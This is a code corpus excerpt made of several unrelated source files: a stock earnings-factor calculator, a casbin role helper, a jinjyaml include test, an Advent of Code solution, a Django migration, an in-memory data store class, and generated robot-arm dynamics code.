                                                          'BIZTOTCOST': 'total_operating_cost',  # total operating cost
                                                          'PERPROFIT': 'operating_profit',  # operating profit
                                                          'PARENETP': 'np_parent_company_owners',  # net profit attributable to parent company owners
                                                          'BIZCOST': 'operating_cost',  # operating cost
                                                          'ASSOINVEPROF': 'invest_income_associates',  # investment income from associates and joint ventures
                                                          'BIZTAX': 'operating_tax_surcharges',  # operating taxes and surcharges
                                                          'ASSEIMPALOSS': 'asset_impairment_loss',  # asset impairment loss
                                                          })
        balance_ttm_sets = engine.fetch_fundamentals_pit_extend_company_id(BalanceTTM,
                                                                           [BalanceTTM.TOTASSET,  # total assets
                                                                            BalanceTTM.RIGHAGGR,  # total owners' (shareholders') equity
                                                                            BalanceTTM.PARESHARRIGH,  # total equity attributable to parent company shareholders
                                                                            ], dates=[trade_date])
        for column in columns:
            if column in list(balance_ttm_sets.keys()):
                balance_ttm_sets = balance_ttm_sets.drop(column, axis=1)
        balance_ttm_sets = balance_ttm_sets.rename(
            columns={'PARESHARRIGH': 'equities_parent_company_owners',  # total equity attributable to parent company shareholders
                     'RIGHAGGR': 'total_owner_equities',  # total owners' (shareholders') equity
                     'TOTASSET': 'total_assets',  # total assets
                     })
        income_ttm_sets_pre_year_1 = engine.fetch_fundamentals_pit_extend_company_id(IncomeTTM,
                                                                                     [IncomeTTM.BIZINCO,
                                                                                      IncomeTTM.NETPROFIT,
                                                                                      ], dates=[trade_date_pre_year])
        for column in columns:
            if column in list(income_ttm_sets_pre_year_1.keys()):
                income_ttm_sets_pre_year_1 = income_ttm_sets_pre_year_1.drop(column, axis=1)
        income_ttm_sets_pre_year_1 = income_ttm_sets_pre_year_1.rename(
            columns={'BIZINCO': 'operating_revenue_pre_year_1',  # operating revenue
                     'NETPROFIT': 'net_profit_pre_year_1',  # net profit
                     })
        income_ttm_sets_pre_year_2 = engine.fetch_fundamentals_pit_extend_company_id(IncomeTTM,
                                                                                     [IncomeTTM.BIZINCO,
                                                                                      IncomeTTM.NETPROFIT,
                                                                                      ], dates=[trade_date_pre_year_2])
        for column in columns:
            if column in list(income_ttm_sets_pre_year_2.keys()):
                income_ttm_sets_pre_year_2 = income_ttm_sets_pre_year_2.drop(column, axis=1)
        income_ttm_sets_pre_year_2 = income_ttm_sets_pre_year_2.rename(
            columns={'BIZINCO': 'operating_revenue_pre_year_2',  # operating revenue
                     'NETPROFIT': 'net_profit_pre_year_2',  # net profit
                     })
        income_ttm_sets_pre_year_3 = engine.fetch_fundamentals_pit_extend_company_id(IncomeTTM,
                                                                                     [IncomeTTM.BIZINCO,
                                                                                      IncomeTTM.NETPROFIT,
                                                                                      ], dates=[trade_date_pre_year_3])
        for column in columns:
            if column in list(income_ttm_sets_pre_year_3.keys()):
                income_ttm_sets_pre_year_3 = income_ttm_sets_pre_year_3.drop(column, axis=1)
        income_ttm_sets_pre_year_3 = income_ttm_sets_pre_year_3.rename(
            columns={'BIZINCO': 'operating_revenue_pre_year_3',  # operating revenue
                     'NETPROFIT': 'net_profit_pre_year_3',  # net profit
                     })
        income_ttm_sets_pre_year_4 = engine.fetch_fundamentals_pit_extend_company_id(IncomeTTM,
                                                                                     [IncomeTTM.BIZINCO,
                                                                                      IncomeTTM.NETPROFIT,
                                                                                      ], dates=[trade_date_pre_year_4])
        for column in columns:
            if column in list(income_ttm_sets_pre_year_4.keys()):
                income_ttm_sets_pre_year_4 = income_ttm_sets_pre_year_4.drop(column, axis=1)
        income_ttm_sets_pre_year_4 = income_ttm_sets_pre_year_4.rename(
            columns={'BIZINCO': 'operating_revenue_pre_year_4',  # operating revenue
                     'NETPROFIT': 'net_profit_pre_year_4',  # net profit
                     })
        # indicator_ttm_sets = engine.fetch_fundamentals_pit_extend_company_id(IndicatorTTM,
        #                                                                      [IndicatorTTM.ROIC,  # return on invested capital
        #                                                                       ], dates=[trade_date]).drop(columns, axis=1)
        #
        # indicator_ttm_sets = indicator_ttm_sets.rename(columns={'ROIC': '',
        #                                                         })
        # Combine the TTM / MRQ frames into one wide frame.
        ttm_earning = pd.merge(income_ttm_sets, balance_ttm_sets, how='outer', on='security_code')
        ttm_earning = pd.merge(ttm_earning, cash_flow_ttm_sets, how='outer', on='security_code')
        ttm_earning = pd.merge(ttm_earning, income_ttm_sets_pre_year_1, how='outer', on='security_code')
        ttm_earning = pd.merge(ttm_earning, income_ttm_sets_pre_year_2, how='outer', on='security_code')
        ttm_earning = pd.merge(ttm_earning, income_ttm_sets_pre_year_3, how='outer', on='security_code')
        ttm_earning = pd.merge(ttm_earning, income_ttm_sets_pre_year_4, how='outer', on='security_code')
        ttm_earning = pd.merge(ttm_earning, balance_mrq_sets, how='outer', on='security_code')
        ttm_earning = pd.merge(ttm_earning, balance_mrq_sets_pre, how='outer', on='security_code')
        # 5-year aggregates: fetch five annual snapshots and sum per stock.
        balance_con_sets = engine.fetch_fundamentals_pit_extend_company_id(BalanceTTM,
                                                                           [BalanceTTM.TOTASSET,  # total assets
                                                                            BalanceTTM.RIGHAGGR,  # total owners' (shareholders') equity
                                                                            ],
                                                                           dates=[trade_date,
                                                                                  trade_date_pre_year,
                                                                                  trade_date_pre_year_2,
                                                                                  trade_date_pre_year_3,
                                                                                  trade_date_pre_year_4,
                                                                                  ])
        for column in columns:
            if column in list(balance_con_sets.keys()):
                balance_con_sets = balance_con_sets.drop(column, axis=1)
        balance_con_sets = balance_con_sets.groupby(['security_code'])
        balance_con_sets = balance_con_sets.sum()
        # NOTE(review): unlike ``income_con_sets`` below there is no
        # ``reset_index()`` here, so 'security_code' stays as the index while
        # the later merge uses ``on='security_code'`` — confirm this works
        # with the pandas version in use.
        balance_con_sets = balance_con_sets.rename(columns={'TOTASSET': 'total_assets',
                                                            'RIGHAGGR': 'total_owner_equities'})
        # cash_flow_con_sets = engine.fetch_fundamentals_pit_extend_company_id(CashFlowReport,
        #                                                                      [CashFlowReport.FINALCASHBALA,
        #                                                                       ],
        #                                                                      dates=[trade_date,
        #                                                                             trade_date_pre_year,
        #                                                                             trade_date_pre_year_2,
        #                                                                             trade_date_pre_year_3,
        #                                                                             trade_date_pre_year_4,
        #                                                                             trade_date_pre_year_5,
        #                                                                             ]).drop(columns, axis=1)
        # cash_flow_con_sets = cash_flow_con_sets.groupby(['security_code'])
        # cash_flow_con_sets = cash_flow_con_sets.sum()
        # cash_flow_con_sets = cash_flow_con_sets.rename(columns={'FINALCASHBALA':'cash_and_equivalents_at_end'})
        income_con_sets = engine.fetch_fundamentals_pit_extend_company_id(IncomeReport,
                                                                          [IncomeReport.NETPROFIT,
                                                                           ],
                                                                          dates=[trade_date,
                                                                                 trade_date_pre_year,
                                                                                 trade_date_pre_year_2,
                                                                                 trade_date_pre_year_3,
                                                                                 trade_date_pre_year_4,
                                                                                 trade_date_pre_year_5,
                                                                                 ])
        for column in columns:
            if column in list(income_con_sets.keys()):
                income_con_sets = income_con_sets.drop(column, axis=1)
        income_con_sets = income_con_sets.groupby(['security_code'])
        income_con_sets = income_con_sets.sum()
        income_con_sets = income_con_sets.rename(columns={'NETPROFIT': 'net_profit'}).reset_index()
        ttm_earning_5y = pd.merge(balance_con_sets, income_con_sets, how='outer', on='security_code')
        return tp_earning, ttm_earning, ttm_earning_5y

    def process_calc_factor(self, trade_date, tp_earning, ttm_earning, ttm_earning_5y):
        """Compute all earnings factors for one trade date.

        :param trade_date: trade date (YYYYMMDD)
        :param tp_earning: report-level frame from :meth:`loading_data`
        :param ttm_earning: TTM/MRQ frame from :meth:`loading_data`
        :param ttm_earning_5y: 5-year aggregate frame from :meth:`loading_data`
        :return: one-row-per-stock DataFrame of factor values
        """
        tp_earning = tp_earning.set_index('security_code')
        ttm_earning = ttm_earning.set_index('security_code')
        ttm_earning_5y = ttm_earning_5y.set_index('security_code')
        earning = factor_earning.FactorEarning()
        # Factor computation: each FactorEarning method appends one or more
        # factor columns onto ``earning_sets``.
        earning_sets = pd.DataFrame()
        earning_sets['security_code'] = tp_earning.index
        earning_sets = earning_sets.set_index('security_code')
        earning_sets = earning.ROA5YChg(ttm_earning_5y, earning_sets)
        earning_sets = earning.ROE5Y(ttm_earning_5y, earning_sets)
        earning_sets = earning.NPCutToNP(tp_earning, earning_sets)
        earning_sets = earning.ROE(tp_earning, earning_sets)
        earning_sets = earning.ROEAvg(tp_earning, earning_sets)
        earning_sets = earning.ROEcut(tp_earning, earning_sets)
        # factor_earning = earning.invest_r_associates_to_tp_latest(tp_earning, earning_sets)
        earning_sets = earning.NetPft5YAvgChgTTM(ttm_earning, earning_sets)
        earning_sets = earning.Sales5YChgTTM(ttm_earning, earning_sets)
        # factor_earning = earning.roa(ttm_earning, earning_sets)
        earning_sets = earning.AdminExpTTM(ttm_earning, earning_sets)
        earning_sets = earning.BerryRtTTM(ttm_earning, earning_sets)
        earning_sets = earning.CFARatioMinusROATTM(ttm_earning, earning_sets)
        earning_sets = earning.SalesCostTTM(ttm_earning, earning_sets)
        earning_sets = earning.EBITToTORevTTM(ttm_earning, earning_sets)
        earning_sets = earning.PeridCostTTM(ttm_earning, earning_sets)
        earning_sets = earning.FinExpTTM(ttm_earning, earning_sets)
        earning_sets = earning.ImpLossToTOITTM(ttm_earning, earning_sets)
        earning_sets = earning.OIAToOITTM(ttm_earning, earning_sets)
        earning_sets = earning.ROAexTTM(ttm_earning, earning_sets)
        earning_sets = earning.NetNonOToTP(ttm_earning, earning_sets)
        earning_sets = earning.NetProfitRtTTM(ttm_earning, earning_sets)
        earning_sets = earning.NPToTORevTTM(ttm_earning, earning_sets)
        earning_sets = earning.OperExpRtTTM(ttm_earning, earning_sets)
        earning_sets = earning.OptProfitRtTTM(ttm_earning, earning_sets)
        # factor_earning = earning.operating_profit_to_tor(ttm_earning, earning_sets)
        earning_sets = earning.ROCTTM(ttm_earning, earning_sets)
        earning_sets = earning.ROTATTM(ttm_earning, earning_sets)
        earning_sets = earning.ROETTM(ttm_earning, earning_sets)
        earning_sets = earning.ROICTTM(ttm_earning, earning_sets)
        earning_sets = earning.OwnROETTM(ttm_earning, earning_sets)
        earning_sets = earning.SalesGrossMarginTTM(ttm_earning, earning_sets)
        earning_sets = earning.TaxRTTM(ttm_earning, earning_sets)
        earning_sets = earning.TotaProfRtTTM(ttm_earning, earning_sets)
        # factor_earning = earning.invest_r_associates_to_tp_ttm(ttm_earning, earning_sets)
        earning_sets = earning_sets.reset_index()
        earning_sets['trade_date'] = str(trade_date)
        # Normalize infinities / Nones to NaN before persisting.
        earning_sets.replace([-np.inf, np.inf, None], np.nan, inplace=True)
        return earning_sets

    def local_run(self, trade_date):
        """Load data, compute the factors and persist them for *trade_date*."""
        print('trade_date %s' % trade_date)
        tic = time.time()
        tp_earning, ttm_earning, ttm_earning_5y = self.loading_data(trade_date)
        print('data load time %s' % (time.time()-tic))
        storage_engine = StorageEngine(self._url)
        result = self.process_calc_factor(trade_date, tp_earning, ttm_earning, ttm_earning_5y)
        print('cal_time %s' % (time.time() - tic))
        # Destination table name is derived from the last method packet,
        # e.g. 'financial.factor_earning' -> 'factor_earning'.
        storage_engine.update_destdb(str(self._methods[-1]['packet'].split('.')[-1]), trade_date, result)
        # storage_engine.update_destdb('factor_earning', trade_date, result)
# def remote_run(self, trade_date):
# total_data = self.loading_data(trade_date)
# #存储数据
# session = str(int(time.time() * 1000000 + datetime.datetime.now().microsecond))
# cache_data.set_cache(session, 'alphax', total_data.to_json(orient='records'))
# distributed_factor.delay(session, json.dumps(self._methods), self._name)
#
# def distributed_factor(self, total_data):
# mkt_df = self.calc_factor_by_date(total_data,trade_date)
# result = self.calc_factor('alphax.alpha191','Alpha191',mkt_df,trade_date)
# @app.task
# def distributed_factor(session, trade_date, packet_sets, name):
# calc_engines = CalcEngine(name, packet_sets)
# content = cache_data.get_cache(session, factor_name)
# total_data = json_normalize(json.loads(content))
# calc_engines.distributed_factor(total_data)
#
# # @app.task()
# def factor_calculate(**kwargs):
# print("constrain_kwargs: {}".format(kwargs))
# date_index = kwargs['date_index']
# session = kwargs['session']
# factor_name = kwargs['factor_name']
# content1 = cache_data.get_cache(session + str(date_index) + "1", date_index)
# content2 = cache_data.get_cache(session + str(date_index) + "2", date_index)
# content3 = cache_data.get_cache(session + str(date_index) + "3", date_index)
# print("len_con1: %s" % len(content1))
# print("len_con2: %s" % len(content2))
# print("len_con3: %s" % len(content3))
# tp_earning = json_normalize(json.loads(str(content1, encoding='utf8')))
# ttm_earning_5y = json_normalize(json.loads(str(content2, encoding='utf8')))
# ttm_earning = json_normalize(json.loads(str(content3, encoding='utf8')))
# # cache_date.get_cache使得index的名字丢失, 所以数据需要按照下面的方式设置index
# tp_earning.set_index('security_code', inplace=True)
# ttm_earning.set_index('security_code', inplace=True)
# ttm_earning_5y.set_index('security_code', inplace=True)
# # total_earning_data = {'tp_earning': tp_earning, 'ttm_earning_5y': ttm_earning_5y, 'ttm_earning': ttm_earning}
# calculate(date_index, tp_earning, ttm_earning, ttm_earning_5y, factor_name)
| 2.3125 | 2 |
plotly/plotly/chunked_requests/__init__.py | SamLau95/plotly.py | 48 | 12762482 | <gh_stars>10-100
from . chunked_request import Stream | 1.117188 | 1 |
backend/app/crud/role.py | shizidushu/simple-report-data-table-vuetify | 13 | 12762483 | from app.mongodb_models.user import User as DBUser
from typing import Optional, List
from app.fields.user import Permission
from app.fields.role import Role
from app.core.permission import enforcer
from app import crud
def get_all_roles() -> List[Role]:
    """Return every casbin role, populated with its members and permissions.

    A casbin "subject" can be either a username or a role; roles are the
    subjects/grouping targets that do not match any stored username.
    """
    known_usernames = {db_user.Username for db_user in DBUser.objects()}
    grouping_roles = [policy[1] for policy in enforcer.get_grouping_policy()]
    role_names = set(enforcer.get_all_subjects()) | set(grouping_roles)
    role_names = list(role_names - known_usernames)

    all_roles = []
    for role_name in role_names:
        # Users that belong to this role.
        members = [
            crud.user.get_user_base(username)
            for username in enforcer.get_users_for_role(role_name)
        ]
        # Policies attached to this role, as Permission objects.
        permissions = [
            Permission(**dict(zip(['sub', 'obj', 'act'], policy)))
            for policy in enforcer.get_filtered_policy(0, role_name)
        ]
        all_roles.append(Role(name=role_name, users=members, permissions=permissions))
    return all_roles
| 2.515625 | 3 |
tests/test_include.py | tanbro/jinjyaml | 1 | 12762484 | <gh_stars>1-10
import unittest
from contextlib import ExitStack
from os import path
from textwrap import dedent
import jinja2
import jinjyaml
import yaml
# YAML tag name registered for Jinja2-templated nodes (used as ``!j2``).
TAG = 'j2'
# Directory holding both the Jinja2 templates and the child YAML fixtures.
SEARCH_PATH = 'tests'
class IncludeTestCase(unittest.TestCase):
    """Exercise ``!j2`` tagged YAML nodes whose templates include other files."""

    j2_env = None

    @classmethod
    def setUpClass(cls):
        # Template loader rooted at the fixture directory; the jinjyaml
        # constructor is registered globally for the '!j2' tag.
        cls.j2_env = jinja2.Environment(
            loader=jinja2.FileSystemLoader(SEARCH_PATH)
        )
        yaml.add_constructor('!{}'.format(TAG), jinjyaml.Constructor())

    def test_include_mapping(self):
        # Render a mapping whose value is a templated node including two
        # child YAML files, then compare with the files parsed directly.
        document = yaml.load(
            dedent('''
            foo: !j2 |
              {% include "child-1.yml" %}
              {% include "child-2.yml" %}
            '''),
            yaml.Loader
        )
        rendered = jinjyaml.extract(document, env=self.j2_env)
        expected = dict()
        with ExitStack() as stack:
            handles = [
                stack.enter_context(open(path.join(SEARCH_PATH, fname)))
                for fname in ("child-1.yml", "child-2.yml")
            ]
            for handle in handles:
                expected.update(yaml.load(handle, yaml.Loader))
        self.assertDictEqual(rendered, {"foo": expected})
# Allow running this module directly: ``python test_include.py``.
if __name__ == '__main__':
    unittest.main()
| 2.421875 | 2 |
2020/Day02/Day02_Prob1_Valid_Passwords.py | guilhermebaos/Advent-of-Code-Solutions | 0 | 12762485 | import re
# Puzzle Input
with open('Day02_Input.txt', 'r') as puzzle_input:
passwords = puzzle_input.read().split('\n')
# Separate the input
processed_passwords = []
for pass_list in passwords:
processed_passwords += [re.split(r'[- :]', pass_list)]
# See if passwords are valid
valid = 0
for pass_list in processed_passwords:
password = <PASSWORD>[4]
if int(pass_list[0]) <= password.count(pass_list[2]) <= int(pass_list[1]):
valid += 1
print(valid)
| 3.296875 | 3 |
people.py | caustin1118/CISC204-ModellingProject | 0 | 12762486 | """A series of modules containing dictionaries that can be used in run.py"""
def test_person_set_1():
    """Return a fixed sample of five person dictionaries for testing."""
    raw = [
        ("Steven", 12, "action", 3),
        ("Jane", 23, "romance", 2),
        ("Alice", 18, "romance", 2),
        ("Henry", 19, "horror", 1),
        ("Alex", 22, "comedy", 3),
    ]
    return [
        {"name": name, "age": age, "likes": likes, "availability": availability}
        for name, age, likes, availability in raw
    ]
| 3.203125 | 3 |
src/djshop/apps/store/migrations/0003_auto_20161205_1901.py | diegojromerolopez/djshop | 0 | 12762487 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-12-05 19:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for the ``store`` app.

    Adds ``Product.main_image`` and re-declares the ``Product.categories``
    many-to-many field. Auto-generated migrations should not be edited by
    hand once applied.
    """

    dependencies = [
        ('store', '0002_auto_20161204_2335'),
    ]

    operations = [
        migrations.AddField(
            model_name='product',
            name='main_image',
            # NOTE(review): ``upload_to=b''`` is a bytes literal (a Django 1.x
            # autogeneration artifact); uploads land directly in MEDIA_ROOT —
            # confirm that is intended.
            field=models.ImageField(default=None, null=True, upload_to=b'', verbose_name='Main image of the product'),
        ),
        migrations.AlterField(
            model_name='product',
            name='categories',
            field=models.ManyToManyField(related_name='products', to='store.ProductCategory', verbose_name='Product categories'),
        ),
    ]
| 1.632813 | 2 |
SimpleSpider/simple_spider/sys_func/datahub.py | snoW3heX/SimpleSpider | 5 | 12762488 | # coding:utf-8
import hashlib
import time
import math
import platform
class DataHub:
    """In-memory data hub: stores arbitrary items and hands out opaque IDs.

    ``size_max`` caps the number of stored items; the historical default of
    0 (and -1) means unlimited. All mutators return the new ID or 1 on
    success and 0 on failure, printing a (Chinese) diagnostic on failure.
    """

    # Class-level defaults kept for backward compatibility; real state is
    # per-instance (set in ``__init__``) so instances no longer share data.
    _tmpData = {}
    _size_max = -1
    _regID = []

    def __init__(self, size_max=0):
        # Fix: previously ``_tmpData`` / ``_regID`` were only class
        # attributes, so every DataHub instance shared the same storage.
        self._tmpData = {}
        self._regID = []
        # 0 (the default) is normalized to -1, meaning "no limit".
        self._size_max = size_max if size_max != 0 else -1

    def put(self, data):
        """Store *data* and return its new ID, or 0 on failure."""
        if self._size_max != -1 and len(self._regID) >= self._size_max:
            print('DataHub中已经达到最大值,无法继续添加')
            return 0
        # Create and register a fresh ID; a duplicate (hash collision or
        # identical salt) leaves the registry length unchanged.
        ID = self._createID()
        beforeLen = len(self._regID)
        self._regID.append(ID)
        self._regID = list(set(self._regID))
        afterLen = len(self._regID)
        if beforeLen == afterLen:
            print('插入时间间隔太短,或者发生哈希碰撞')
            return 0
        self._tmpData[ID] = [data]
        return ID

    def get(self, ID):
        """Return the item stored under *ID*, or 0 if unknown."""
        if ID in self._regID:
            return self._tmpData[ID][0]
        else:
            print('没有这个ID对于的数据')
            return 0

    def update(self, ID, data):
        """Replace the item stored under *ID*; return 1 on success, 0 otherwise."""
        if ID in self._regID:
            self._tmpData[ID] = [data]
            return 1
        else:
            print('没有这个ID对于的数据')
            return 0

    def dele(self, ID):
        """Delete the item stored under *ID*; return 1 on success, 0 otherwise."""
        if len(self._regID) == 0:
            print('DataHub中已经没有数据了')
            return 0
        if ID in self._regID:
            self._tmpData.pop(ID)
            self._regID.remove(ID)
            return 1
        else:
            print('没有这个ID对于的数据')
            return 0

    def _createID(self):
        # Derive an opaque ID from the wall-clock second, a monotonic
        # high-resolution counter and the platform string.
        # Fix: ``time.clock()`` was removed in Python 3.8; ``perf_counter()``
        # provides an equivalent monotonically increasing salt.
        return hashlib.md5(
            str(hashlib.md5(self._NowTime().encode('utf-8')).hexdigest() + str(time.perf_counter()) +
                platform.platform().replace('-', '').replace('.', '')).encode('utf-8')
        ).hexdigest()

    def showAllDataItem(self):
        """Return the raw internal ``{ID: [data]}`` mapping."""
        return self._tmpData

    def showDataItem(self):
        """Return the number of stored items."""
        return len(self._regID)

    def clearAll(self):
        """Remove every stored item and registered ID."""
        self._tmpData.clear()
        self._regID.clear()

    @staticmethod
    def _NowTime():
        # Wall-clock timestamp with separators stripped, upper-cased.
        return str(time.asctime()).replace(':', '').replace(' ', '').upper()
# def main():
# DH = DataHub(size_max=1)
# i = DH.put([1, 2, 3])
# data = DH.get(i)
# print(data)
# data[0] = data[1] + data[2]
# DH.update(i, data)
# j = DH.put([5, 5, 444])
# print(DH.showDataItem())
# print(DH.showAllDataItem())
#
# DH.dele(i)
# print(DH.showDataItem())
# print(DH.showAllDataItem())
#
# DH.dele(j)
# print(DH.showDataItem())
# print(DH.showAllDataItem())
#
#
# if __name__ == '__main__':
# main() | 2.828125 | 3 |
hrl_dynamic_mpc/src/darci_left_dynamics.py | gt-ros-pkg/hrl-haptic-manip | 1 | 12762489 | <filename>hrl_dynamic_mpc/src/darci_left_dynamics.py<gh_stars>1-10
#
#
# Copyright (c) 2013, Georgia Tech Research Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Georgia Tech Research Corporation nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY GEORGIA TECH RESEARCH CORPORATION ''AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL GEORGIA TECH BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# \authors: <NAME> (Healthcare Robotics Lab, Georgia Tech.)
# \adviser: <NAME> (Healthcare Robotics Lab, Georgia Tech.)
# Generated from sympybotics library (https://github.com/cdsousa/sympybotics)
from math import sin, cos
import numpy as np
def tau( parms, q, dq, ddq ) :
#
tau_out = [0]*7
#
x0 = cos(q[1])
x1 = sin(q[2])
x2 = cos(q[2])
x3 = dq[0]*x0
x4 = -dq[1]*x1 - x2*x3
x5 = sin(q[1])
x6 = -x5
x7 = dq[0]*x6
x8 = -x7
x9 = dq[2] + x8
x10 = -x3
x11 = dq[1]*x2 + x1*x10
x12 = parms[26]*x11 + parms[28]*x4 + parms[29]*x9
x13 = parms[25]*x11 + parms[27]*x4 + parms[28]*x9
x14 = dq[1]*x3
x15 = -ddq[0]*x5 - x14
x16 = -x15
x17 = 9.81*sin(q[0])
x18 = -x17
x19 = -x18
x20 = dq[1]*x7
x21 = ddq[0]*x0 + x20
x22 = 0.03175*x14 + 0.03175*x16 + x19 + 0.27857*x20 + 0.27857*x21
x23 = x3*x7
x24 = -9.81*cos(q[0])
x25 = x24*x6
x26 = -x25
x27 = ((dq[1])*(dq[1]))
x28 = -0.27857*ddq[1] + 0.27857*x23 + x26 - 0.03175*x27 - 0.03175*((x7)*(x7))
x29 = x1*x22 + x2*x28
x30 = -x29
x31 = ddq[1]*x2 + dq[2]*x4 - x1*x21
x32 = -x24
x33 = x0*x32
x34 = -x33
x35 = 0.03175*ddq[1] + 0.03175*x23 - 0.27857*x27 - 0.27857*((x3)*(x3)) + x34
x36 = ddq[2] + x16
x37 = -ddq[1]*x1 - dq[2]*x11 - x2*x21
x38 = -x4
x39 = dq[3] + x38
x40 = sin(q[3])
x41 = cos(q[3])
x42 = x11*x41 + x40*x9
x43 = x11*x40
x44 = x41*x9
x45 = -x43 + x44
x46 = parms[36]*x42 + parms[37]*x45 + parms[38]*x39
x47 = ((x9)*(x9))
x48 = ((x4)*(x4))
x49 = -x47 - x48
x50 = -x2
x51 = x1*x28 + x22*x50
x52 = -0.00502*x49 + x51
x53 = -x37
x54 = x11*x9
x55 = x53 + x54
x56 = x35 - 0.00502*x55
x57 = x40*x56 + x41*x52
x58 = ddq[3] + x53
x59 = parms[38]*x42 + parms[40]*x45 + parms[41]*x39
x60 = -dq[3]
x61 = x31*x41 + x36*x40 + x60*(x43 - x44)
x62 = -x31
x63 = x36*x41 + x40*x62 + x42*x60
x64 = x11*x4
x65 = x36 + x64
x66 = x30 + 0.00502*x65
x67 = ddq[4] + x63
x68 = cos(q[4])
x69 = sin(q[4])
x70 = -x39*x68 - x42*x69
x71 = -x70
x72 = dq[4] + x45
x73 = -x69
x74 = x39*x73 + x42*x68
x75 = parms[48]*x74 + parms[49]*x70 + parms[50]*x72
x76 = x39*x45
x77 = x61 + x76
x78 = x66 + 0.27747*x77
x79 = -x58
x80 = x42*x45
x81 = x79 + x80
x82 = x57 + 0.27747*x81
x83 = -x68*x78 - x69*x82
x84 = dq[4]*x70 + x61*x68 + x69*x79
x85 = x68*x82 + x73*x78
x86 = -x85
x87 = parms[49]*x74 + parms[51]*x70 + parms[52]*x72
x88 = -dq[4]*x74 - x58*x68 - x61*x69
x89 = -x84
x90 = cos(q[5])
x91 = x72*x90
x92 = sin(q[5])
x93 = x74*x92
x94 = -x67
x95 = dq[5]*(-x91 + x93) + x89*x90 + x92*x94
x96 = -x88
x97 = ddq[5] + x96
x98 = dq[5] + x71
x99 = -x72*x92 - x74*x90
x100 = x91 - x93
x101 = parms[60]*x100 + parms[61]*x99 + parms[62]*x98
x102 = dq[5]*x99 + x67*x90 + x89*x92
x103 = -x83
x104 = ((x39)*(x39))
x105 = ((x42)*(x42))
x106 = -x104 - x105
x107 = -x40
x108 = x107*x52 + x41*x56
x109 = 0.27747*x106 + x108
x110 = x109*x90 + x86*x92
x111 = parms[62]*x100 + parms[64]*x99 + parms[65]*x98
x112 = sin(q[6])
x113 = x100*x112
x114 = cos(q[6])
x115 = x114*x98
x116 = -x102
x117 = -x97
x118 = dq[6]*(x113 - x115) + x112*x117 + x114*x116
x119 = -x95
x120 = ddq[6] + x119
x121 = -x103*x112 - x110*x114
x122 = -x110
x123 = x103*x114 + x112*x122
x124 = -x100*x114 - x112*x98
x125 = dq[6]*x124 + x112*x116 + x114*x97
x126 = -x113 + x115
x127 = -x99
x128 = dq[6] + x127
x129 = parms[72]*x126 + parms[73]*x124 + parms[74]*x128
x130 = parms[73]*x126 + parms[75]*x124 + parms[76]*x128
x131 = parms[74]*x125 + parms[76]*x118 + parms[77]*x120 + parms[78]*x121 - parms[79]*x123 - x124*x129 + x126*x130
x132 = parms[61]*x102 + parms[63]*x95 + parms[64]*x97 - parms[66]*x103 + parms[68]*x110 - x100*x111 + x101*x98 - x131
x133 = -x92
x134 = -x109*x92 - x85*x90
x135 = -x134
x136 = parms[74]*x126 + parms[76]*x124 + parms[77]*x128
x137 = parms[72]*x125 + parms[73]*x118 + parms[74]*x120 + parms[79]*x135 - parms[80]*x121 + x124*x136 - x128*x130
x138 = -x112
x139 = parms[73]*x125 + parms[75]*x118 + parms[76]*x120 - parms[78]*x135 + parms[80]*x123 - x126*x136 + x128*x129
x140 = parms[61]*x100 + parms[63]*x99 + parms[64]*x98
x141 = parms[60]*x102 + parms[61]*x95 + parms[62]*x97 + parms[67]*x103 + parms[68]*x135 + x111*x99 - x114*x139 + x137*x138 - x140*x98
x142 = parms[50]*x84 + parms[52]*x88 + parms[53]*x67 + parms[54]*x83 + parms[55]*x86 + x132*x133 + x141*x90 + x71*x75 + x74*x87
x143 = parms[37]*x61 + parms[39]*x63 + parms[40]*x58 - parms[42]*x66 + parms[44]*x57 + x142 + x39*x46 - x42*x59
x144 = parms[50]*x74 + parms[52]*x70 + parms[53]*x72
x145 = parms[62]*x102 + parms[64]*x95 + parms[65]*x97 + parms[66]*x134 + parms[67]*x122 + x100*x140 + x101*x127 + x114*x137 + x138*x139
x146 = parms[49]*x84 + parms[51]*x88 + parms[52]*x67 - parms[54]*x109 + parms[56]*x85 - x144*x74 - x145 + x72*x75
x147 = x72*x74
x148 = ((x72)*(x72))
x149 = ((x70)*(x70))
x150 = x70*x74
x151 = x100*x98
x152 = x100*x99
x153 = ((x98)*(x98))
x154 = ((x99)*(x99))
x155 = ((x126)*(x126))
x156 = ((x128)*(x128))
x157 = x124*x128
x158 = x124*x126
x159 = -parms[78]*(x120 + x158) - parms[79]*(-x155 - x156) - parms[80]*(-x125 + x157) - parms[81]*x121
x160 = x126*x128
x161 = ((x124)*(x124))
x162 = parms[78]*(-x156 - x161) + parms[79]*(-x120 + x158) + parms[80]*(x118 + x160) + parms[81]*x123
x163 = parms[66]*(-x153 - x154) + parms[67]*(x117 + x152) + parms[68]*(x151 + x95) + parms[69]*x110 + x114*x159 + x138*x162
x164 = x98*x99
x165 = ((x100)*(x100))
